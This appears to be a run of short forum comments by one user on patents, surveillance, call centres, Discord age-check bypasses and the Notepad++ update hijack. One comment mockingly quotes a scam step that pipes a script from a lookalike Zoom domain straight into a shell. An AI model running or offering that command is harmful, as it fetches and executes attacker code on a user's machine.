Elvith Ma'for

I mean, I get the idea of patents. If there were no protection of “ideas”, some random person could have one, try to bring it to market but could just be outplayed by a big corporation with enough money to copy this idea and sell it everywhere before he can even start production. They have more resources and money, but might not have had that idea. There should be some protection. Problem is, that these are also abused by the big corporations, so… Maybe we need to fix this somehow.

set MEETING_JWT="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.4030636137.signature"
curl -s https://zoom.uz07web.us/api/mn/4030636137/update/2 | zsh

Uhm… Yeah… Exactly the way I update my software, too…

Also wtf is that JWT? The header looks right (base64 string starting with ey equates to {, so it’s probably json), but the body is… Too short? And why does it say signature instead of containing a (base64) signature? At least make it believable. Noone’s gonna decode that anyways. Just fill it with garbage!

Should all cars have breathalyzers installed by default?

Yes!

But should all cars have a reader for your government ID and drivers license and immediately log every use of your car to $authority?

Are we talking about biological age or mental age which means that most adults are still just honey teens with just a tad better impulse control?

Too bad, that the normal price for that is now a 4-digit sum and will the cost you still $500+…

Here you go

https://github.com/mrshmllow/affinity-everywhere?tab=readme-ov-file

Agreed. The US can access/subpoena any data it wants from US companies, even if the servers they host the data on are in Europe or Asia or…

It doesn’t matter where the servers and the data is located. It matters who posses (or controls the access) to it.

Yeah, but if I understand that correctly, that’s just for the app itself the LLM is very likely still a proprietary one (ChatGPT, Grok,…)

non-commitment like “I can’t do that” or “that’s against policy” or “that’s not my dept”

Ok, I’m not a native English speaker but… I have the feeling that they don’t know what non-commitment means. Unless it’s commitment to fuck the customer, but then, why bother to offer a call center?

Time for a classic: The Case of the 500-Mile Email

Edit: The site seems to be overloaded, but it’s also on Archive.org: https://web.archive.org/web/20260220060645/https://www.ibiblio.org/harris/500milemail.html

Delays - if you use the internet and request an answer from an LLM, you won’t notice if it’s 300-500ms slower than usual. But if you deploy and run a software stack, a delay of 5ms betweenntze app and the database can make the difference between a usable application and an inperfomant one.

How do I do that on Mastodon, Lemmy, Piefed,…?

^/s

lp0 on fire

Looks to me like they’re essentially redirecting the request from the normal api to do age checks to their own api, and just saying “Sure, they’re an adult” to discord (since that is all the “proper” api tells them).

Wait… Those amateurs [at discord and the age check company] didn’t even think of signing the check in any way and then verifying the data they get send back? That’s not even hard to implement?!

Im using SchildiChat on Android

Help, how do I get out!!!

^/s

As the hoster wrote this:

we immediately transferred all clients’ web hosting subscriptions from this server

It looks like the binaries and the update check script were put on a simple web space. If that is the correct conclusion to draw from this excerpt, then it’d be rather strange to have the keys on that server as it’s very unlikely that it was used to produce any builds.

From my understanding: Basically the attackers could reply to your version check request (usually done automatically) and tell N++ that there were a new version available. If you then approved the update dialogue, N++ would download and execute the binary from the update link that the server sent you. But this didn’t necessarily need to be a real update, it could have been any binary since neither the answer to the update check nor the download link were verified by N++

In my pocket